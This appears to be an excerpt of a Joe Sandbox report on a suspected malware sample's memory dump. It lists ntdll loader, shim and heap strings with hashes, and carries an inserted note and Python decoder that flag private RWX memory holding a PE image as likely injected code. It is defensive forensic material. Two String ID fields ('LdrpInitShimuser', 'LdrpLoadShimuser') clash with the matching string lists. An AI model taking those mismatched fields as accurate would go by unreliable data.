                                              • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 120290c4a2e435de4b9ac69c2b4955694e71179761b8e6fc5faf5dabbf2d6ff4
                                              • Instruction ID: 6f2dec728f6fad68030361916febb22e3d181c3bb9bbd9e549324104ad391b7e
                                              • Opcode Fuzzy Hash: 120290c4a2e435de4b9ac69c2b4955694e71179761b8e6fc5faf5dabbf2d6ff4
                                              • Instruction Fuzzy Hash: 9951E7B5E00216BFEB10DF99C98097EFBB8FB482407608169E465DB641D674DE50CBE4

                                              Control-flow Graph
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                              • API String ID: 48624451-2108815105
                                              • Opcode ID: 1ff7465878cd814262d6e5dbe6cd97146c3ba077adb45234a90b5938e904e4e9
                                              • Instruction ID: c4adb31b6cecb1eea26c76137e835dbcc2fcb7b6a8615cb9be04578c422dce5e
                                              • Opcode Fuzzy Hash: 1ff7465878cd814262d6e5dbe6cd97146c3ba077adb45234a90b5938e904e4e9
                                              • Instruction Fuzzy Hash: 48514874A10645AFEB20CFDCCC90A7FBBFCEB48242B618459E495CF241DAB5DA40CB64

                                              Control-flow Graph
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: HEAP:
                                              • API String ID: 3446177414-2466845122
                                              • Opcode ID: c0f2be34aa230c2c634a133ee7bd37c502cb459bd7c3126fb45650b9ab805cf6
                                              • Instruction ID: f9d014d115dc0e913998e92f8ee06a4a47799b7165daf96824ce0a4cbc680d5b
                                              • Opcode Fuzzy Hash: c0f2be34aa230c2c634a133ee7bd37c502cb459bd7c3126fb45650b9ab805cf6
                                              • Instruction Fuzzy Hash: B9A17775A043118FE704CF28C890A1AB7E6BF88354F15456EEE45EB321EBB0ED46CB91

                                              Control-flow Graph
                                              Strings
                                              • Execute=1, xrefs: 369B4713
                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 369B46FC
                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 369B4725
                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 369B4655
                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 369B4787
                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 369B4742
                                              • ExecuteOptions, xrefs: 369B46A0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                              • API String ID: 0-484625025
                                              • Opcode ID: 58ea6bba327d447ee24069f98b03b9e7329150763e6b42d4df9e26625f7a1d07
                                              • Instruction ID: c2ac55a2ed4c2d03c888bbf9e4e399301dc40133ad079d3ed51035da9947cf3b
                                              • Opcode Fuzzy Hash: 58ea6bba327d447ee24069f98b03b9e7329150763e6b42d4df9e26625f7a1d07
                                              • Instruction Fuzzy Hash: 08514B75A00319BAEF10DAA5DC89FAA77ACEF04344F5000E9D604AB185EB71DF41CF62
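Every function entry in this part of the report points at the same memory dump source, 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, "based on PE: true". The three 8-digit hex fields after the base address (00000040, 00001000, 00020000) are exactly the winnt.h values PAGE_EXECUTE_READWRITE, MEM_COMMIT and MEM_PRIVATE, which is the security-relevant detail here: a PE image (the strings are ntdll's own loader, SxS and heap debug messages) sitting in private, writable, executable memory that the OS image loader did not map (loader-mapped sections are MEM_IMAGE). The decoder below is an added example written for this note, not Joe Sandbox code; the field layout of the .sdmp name (process slot, stage, sequence number, base, protect, state, type, extra) is an assumption inferred from those values, and the second, image-backed dump name in the usage block is constructed for contrast.

```python
import re
from dataclasses import dataclass

# winnt.h memory protection / state / type constants (MEMORY_BASIC_INFORMATION fields)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_GUARD = 0x100
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED layout of a Joe Sandbox .sdmp name (the report does not document it):
#   <proc>.<stage>.<seq>.<base>.<protect>.<state>.<type>.<extra>.sdmp
# The three 8-hex-digit fields after the base match winnt.h Protect/State/Type values.
_NAME_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<stage>[0-9a-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\."
    r"(?P<mtype>[0-9a-f]{8})\.(?P<extra>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    proc: int
    stage: int
    base: int
    protect: int
    state: int
    mtype: int

    @property
    def protect_name(self) -> str:
        name = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")
        return name + ("|PAGE_GUARD" if self.protect & PAGE_GUARD else "")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def image_backed(self) -> bool:
        # Only sections mapped by the image loader carry MEM_IMAGE.
        return self.mtype == 0x1000000


def parse_sdmp_name(name: str) -> DumpRegion:
    """Decode one dump name; tolerates the 'Download File' link text glued to it."""
    name = name.strip().removesuffix("Download File").strip()
    m = _NAME_RE.match(name)
    if not m:
        raise ValueError(f"not a dump name in the assumed layout: {name!r}")
    return DumpRegion(
        proc=int(m["proc"], 16), stage=int(m["stage"], 16), base=int(m["base"], 16),
        protect=int(m["protect"], 16), state=int(m["state"], 16), mtype=int(m["mtype"], 16),
    )


def triage(name: str, based_on_pe: bool) -> list[str]:
    """Reasons a dumped region deserves a closer look; an empty list means none."""
    r = parse_sdmp_name(name)
    reasons = []
    if r.executable and r.writable:
        reasons.append(f"RWX region at 0x{r.base:x} ({r.protect_name})")
    if r.executable and not r.image_backed:
        kind = MEM_TYPE.get(r.mtype, hex(r.mtype))
        reasons.append(f"executable memory at 0x{r.base:x} is {kind}, not MEM_IMAGE")
    if based_on_pe and not r.image_backed:
        reasons.append("PE header present in memory the OS image loader did not map")
    return reasons


if __name__ == "__main__":
    # First name is the report's own dump source; the second is constructed to look
    # like a normally loaded, execute-read image section for contrast.
    samples = [
        ("00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp", True),
        ("00000006.00000002.3114944533.0000000077000000.00000020.00001000.01000000.00000000.sdmp", True),
    ]
    for name, pe in samples:
        print(name.split(".")[3], triage(name, pe) or "nothing unusual")
```

Run against this report, the 36910000 region is flagged three times (RWX, private rather than image-backed, PE present without the image loader). A region with the same "based on PE" annotation but 0x20/0x1000/0x1000000 fields, the profile of a DLL the loader mapped itself, is not flagged, which is the contrast an analyst wants when skimming hundreds of these dump references.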
                                              Strings
                                              • SsHd, xrefs: 3695A3E4
                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 369A79D0, 369A79F5
                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 369A7AE6
                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369A79D5
                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369A79FA
                                              • Actx , xrefs: 369A7A0C, 369A7A73
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                              • API String ID: 0-1988757188
                                              • Opcode ID: b7b6eead1427232db2c21f6a9be8803b38575202da49796a06df769f62814ee6
                                              • Instruction ID: 7dd0d6e06ede4ae95de7726eb28ee714251b872764226c25768c0264c3f0bcf8
                                              • Opcode Fuzzy Hash: b7b6eead1427232db2c21f6a9be8803b38575202da49796a06df769f62814ee6
                                              • Instruction Fuzzy Hash: 27E1D574A043028FE710CF25C894B1B77E5BB84368F624A2DFA55CB290DB71DD45CB86
                                              Strings
                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 369A9341, 369A9366
                                              • GsHd, xrefs: 3695D874
                                              • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 369A9565
                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369A9346
                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 369A936B
                                              • Actx , xrefs: 369A9508
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                              • API String ID: 3446177414-2196497285
                                              • Opcode ID: a5b38212b517f9a4f16aab29b4b3ffb89363aa188227aba17fa617c2e4a48a79
                                              • Instruction ID: 32c5950657286a69e45b24ce2eddb671fa3bd10a513b177f495e2d97803b3ccf
                                              • Opcode Fuzzy Hash: a5b38212b517f9a4f16aab29b4b3ffb89363aa188227aba17fa617c2e4a48a79
                                              • Instruction Fuzzy Hash: 1FE1E374A143028FE710CF55C890B5AB7F8FF88358F614A2DEA95CB281DB31D948CB86
                                              APIs
                                              • RtlDebugPrintTimes.NTDLL ref: 3693656C
                                                • Part of subcall function 369365B5: RtlDebugPrintTimes.NTDLL ref: 36936664
                                                • Part of subcall function 369365B5: RtlDebugPrintTimes.NTDLL ref: 369366AF
                                              Strings
                                              • Loading the shim user DLL failed with status 0x%08lx, xrefs: 36999A2A
                                              • apphelp.dll, xrefs: 36936496
                                              • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 369999ED
                                              • Getting the shim user exports failed with status 0x%08lx, xrefs: 36999A01
                                              • minkernel\ntdll\ldrinit.c, xrefs: 36999A11, 36999A3A
                                              • LdrpInitShimEngine, xrefs: 369999F4, 36999A07, 36999A30
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-204845295
                                              • Opcode ID: b9b95783c99a21069cdd81754670e1832f9c128678fddec5f9dd65ba466b8698
                                              • Instruction ID: eb3249d54b21e203fb2ca91141958462c3be4408566ca5e0a8d40a476d88cd73
                                              • Opcode Fuzzy Hash: b9b95783c99a21069cdd81754670e1832f9c128678fddec5f9dd65ba466b8698
                                              • Instruction Fuzzy Hash: DB51B171A093089FE320CF24CC51B9B77EDEB84794F640919F685AB1A1EA30DD05CB97
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                              • API String ID: 3446177414-4227709934
                                              • Opcode ID: 051d2f3d12baf15e0e7f4e34f721d3da759ad865a081c6c019f09d766f877254
                                              • Instruction ID: 9903c6333455cbf56375e52db06f07b1fa67ab5e0eb1b578988ed6f79614db8f
                                              • Opcode Fuzzy Hash: 051d2f3d12baf15e0e7f4e34f721d3da759ad865a081c6c019f09d766f877254
                                              • Instruction Fuzzy Hash: 26414DB9D00209AFDF01DFD9D980AEEBBB9BF48754F240159E904A7341D7319D51CBA0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                              • API String ID: 3446177414-3492000579
                                              • Opcode ID: ec5077d69360a8f2fae3d1d37eebd7cec6cdea0ce776792a8b115900a9060fc7
                                              • Instruction ID: b5b226011a36f301a7f9ff262d6df06e3c9dd787bc2f3b36ce050503e5014e19
                                              • Opcode Fuzzy Hash: ec5077d69360a8f2fae3d1d37eebd7cec6cdea0ce776792a8b115900a9060fc7
                                              • Instruction Fuzzy Hash: 7471DF71911A84DFDB02CF68C8406ADFBF6FF4A394F25805AE541AB252C739DD42CB90
                                              Strings
                                              • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36999AB4
                                              • minkernel\ntdll\ldrinit.c, xrefs: 36999AC5, 36999B06
                                              • LdrpLoadShimEngine, xrefs: 36999ABB, 36999AFC
                                              • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 36999AF6
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimuser$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 3446177414-3589223738
                                              • Opcode ID: 62081e7653d37bc4821584994edcce435a130babae032a90e1457c881fe74ad5
                                              • Instruction ID: 84093ce7f659c9e8a45ddddae8ba2c26ef85325cc91d752ebda5b5d2c3b8dbd7
                                              • Opcode Fuzzy Hash: 62081e7653d37bc4821584994edcce435a130babae032a90e1457c881fe74ad5
                                              • Instruction Fuzzy Hash: 82512336A013589FDB04DBACCC54ADD7BFABB44388F340066E641BF296DB649C52CB91
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                              • API String ID: 3446177414-3224558752
                                              • Opcode ID: 3fa9dcefad555c38b3745accdef90041963fa1ec3121a7c14018682edce3c009
                                              • Instruction ID: 18c5e37649733915e7417e48f8e15c2c3a70557a462bc754882cc51d7af988f7
                                              • Opcode Fuzzy Hash: 3fa9dcefad555c38b3745accdef90041963fa1ec3121a7c14018682edce3c009
                                              • Instruction Fuzzy Hash: 93412375A10748DFE312CF26C884B5AB7F8EF40368F308569D5116B391CB38E985CB91
                                              Strings
                                              • Entry Heap Size , xrefs: 369EF26D
                                              • HEAP: , xrefs: 369EF15D
                                              • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 369EF263
                                              • ---------------------------------------, xrefs: 369EF279
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                              • API String ID: 3446177414-1102453626
                                              • Opcode ID: 8088b09614879d274aae769cb1e1fe75590e5223983f727ca9b2f34dd546c114
                                              • Instruction ID: 4c9ea9aa34de50eb28b607793ff3583d3f1e990c7f97f025d1a0e6511fa2590b
                                              • Opcode Fuzzy Hash: 8088b09614879d274aae769cb1e1fe75590e5223983f727ca9b2f34dd546c114
                                              • Instruction Fuzzy Hash: 34418D79A01215DFC706CF59C884905BBFAEF5A3D873680AAD508AB311D731EC43CBA0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                              • API String ID: 3446177414-1222099010
                                              • Opcode ID: f800f95b6dce3df723e7b0abf1a80462dbb83d4da453a75b2e8b75f0914835d3
                                              • Instruction ID: 288a0ce59a5e82c80ee3375acc6c25c1e0d516e1b3dc22fd518ce0c9ae1b5232
                                              • Opcode Fuzzy Hash: f800f95b6dce3df723e7b0abf1a80462dbb83d4da453a75b2e8b75f0914835d3
                                              • Instruction Fuzzy Hash: 6E315935505788DFE722CB29CC09B4A7BE8EF017A8F314085E4126B652CB7CEC85CB92
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                              • Instruction ID: 7253a2c5bfc5bce88300d8a08c919ddfaecd743de10bfd47743d0a8390de1483
                                              • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                              • Instruction Fuzzy Hash: 9E0233B5508341AFD304CF19C990A6BBBF5EFC8714F509A2DF9898B261DB31E905CB82
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-$0$0
                                              • API String ID: 1302938615-699404926
                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction ID: 8b8cf56786c6ddf3ca05fa8b0ebdff3d192f4fcb5deb564ee6b44ce186cc037e
                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                              • Instruction Fuzzy Hash: F5810378E0135A8EEF14CF65C8907EEBBB9AF45360F6C4219D870A76D9CB349840CB51
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$@
                                              • API String ID: 3446177414-1194432280
                                              • Opcode ID: f0028171f8a498c896145a0c276f45c7a47eb9bb45411e169de3fd173e481a79
                                              • Instruction ID: 7749c38357408bef04d3275b92179cef48332ec6a0a125db3b4094cc5ebab1ca
                                              • Opcode Fuzzy Hash: f0028171f8a498c896145a0c276f45c7a47eb9bb45411e169de3fd173e481a79
                                              • Instruction Fuzzy Hash: 8C8129B5D002699FDB21CB55CC44BDEB7B8AB08750F1041EAAA09B7240E7309E85CFA5
                                              Strings
                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 369B365C
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 369B3640, 369B366C
                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 369B362F
                                              • LdrpFindDllActivationContext, xrefs: 369B3636, 369B3662
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
• Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 3446177414-3779518884
                                              • Opcode ID: 474fc231cc2fd54aea9a5e36cb2348133cc9f879a6738970a0444d6c2a451843
                                              • Instruction ID: 231bbd7af3afd2d9cd086235148fcd8cce0f0819ec89b5e426b06f7c2d3e99f7
                                              • Opcode Fuzzy Hash: 474fc231cc2fd54aea9a5e36cb2348133cc9f879a6738970a0444d6c2a451843
                                              • Instruction Fuzzy Hash: 74311666D00315EEEF21DA49CC88A56B2ACAF41B94F724067D9C467153DBA0BC81C6FD
                                              Strings
                                              • apphelp.dll, xrefs: 36962462
                                              • minkernel\ntdll\ldrinit.c, xrefs: 369AA9A2
                                              • LdrpDynamicShimModule, xrefs: 369AA998
                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 369AA992
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_36910000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-176724104
                                              • Opcode ID: bb2afa8085fe8707c5414da129887d60ca73a994cf70a0ada5bc9a80fc1c8ac5
                                              • Instruction ID: be771ee2202d0bf2bec585c65d0dbdaf7a5cb29c5e87d945a27d63648e283e34
                                              • Opcode Fuzzy Hash: bb2afa8085fe8707c5414da129887d60ca73a994cf70a0ada5bc9a80fc1c8ac5
                                              • Instruction Fuzzy Hash: DD312675A00341ABE710DF5DCD40A6A7BFAFB88794F350059EA00BB241C7B89C53CB80
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.3114944533.0000000036910000.00000040.00001000.00020000.00000000.sdmp, Offset: 36910000, based on PE: true
                                               • Associated: 00000006.00000002.3114944533.0000000036A39000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036A3D000.00000040.00001000.00020000.00000000.sdmp
                                               • Associated: 00000006.00000002.3114944533.0000000036AAE000.00000040.00001000.00020000.00000000.sdmp
